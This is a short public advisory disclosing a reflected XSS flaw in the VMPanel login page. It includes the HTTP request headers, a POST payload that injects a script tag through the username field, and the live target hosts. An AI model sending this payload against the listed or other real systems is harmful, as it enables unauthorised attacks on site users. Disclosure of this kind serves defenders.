VMPanel cybervm XSS

2016-12-05 / 2016-12-09
ir Rahimian (IR) ir
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

1. Introduction Affected Product: VMPanel Vendor Website: http://cybervm.com Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 12/03/2016 Disclosed to public: 12/05/2016 Author : Esmaeil Rahimian CVE: n/a Credits Esmaeil Rahimian Of SecureHost : Rahimian@Securehost.co 2. Overview VMPanel is a powerful web based VMware Esx/Esxi Control Panel + WHMCS addon with VMPanel you can create or remove virtual machines remotely without the need to access vsphere Client aslo you can Power Off,Power On, reset,virtual machine through the panel and module for WHMCS 3. Details XSS : Reflected XSS in login page Cache-Control: no-cache Connection: Keep-Alive Referer: http://vmpanel.ir:2023/ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Accept-Language: en-us,en;q=0.5 Host: http://vmpanel.ir:2023 Accept-Encoding: gzip, deflate Content-Length: 90 Content-Type: application/x-www-form-urlencoded POST Method: username='"><script>alert('XSS');</script> <a id="&password=&login=Login Online Demo : https://youtu.be/-n6OOSXxDCc Online Target : http://vmpanel.ir:2023 http://cybervm.com:2023

References:

http://cybervm.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top